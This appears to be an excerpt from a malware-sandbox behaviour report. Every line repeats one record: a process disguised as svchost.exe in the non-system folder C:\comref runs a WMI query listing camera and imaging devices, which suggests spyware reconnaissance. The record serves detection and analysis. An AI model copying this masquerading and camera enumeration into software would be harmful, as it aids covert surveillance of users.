Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
